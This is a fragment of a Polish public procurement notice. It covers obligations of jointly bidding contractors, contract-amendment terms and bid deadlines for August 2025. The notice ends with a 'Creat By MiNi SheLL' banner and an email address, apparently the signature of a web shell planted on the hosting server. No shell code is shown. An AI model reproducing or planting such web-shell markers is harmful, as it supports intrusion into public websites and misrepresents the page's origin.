udzielenie zamówienia, musi oddzielnie udokumentować fakt, że nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt.4 ustawy Pzp.<br/>14.9.3.	wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem,<br/>14.9.4.	z treści formularza ofertowego powinno wynikać, że oferta składana jest w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w miejsce „WYKONAWCA”, należy wpisać nazwy Wykonawców i dane umożliwiające ich identyfikację.<br/>14.10.	W przypadku o którym mowa w art. 117 ust. 2 i 3 ustawy Pzp Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są do dołączenia do oferty oświadczenia, z którego wynika, które dostawy wykonają poszczególni Wykonawcy. (Wzór oświadczenia stanowi załącznik nr 5 do SWZ) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy jest możliwa w przypadkach określonych w art. 455 Pzp.<br/>2.	Nie stanowi zmiany umowy w rozumieniu ustawy Prawo zamówień publicznych:<br/>a)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego),<br/>b)	zmiany danych teleadresowych, <br/>3.	Wszelkie zmiany do niniejszej umowy wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://puik-lukow.ezamawiajacy.pl/servlet/HomeServlet.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-28 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com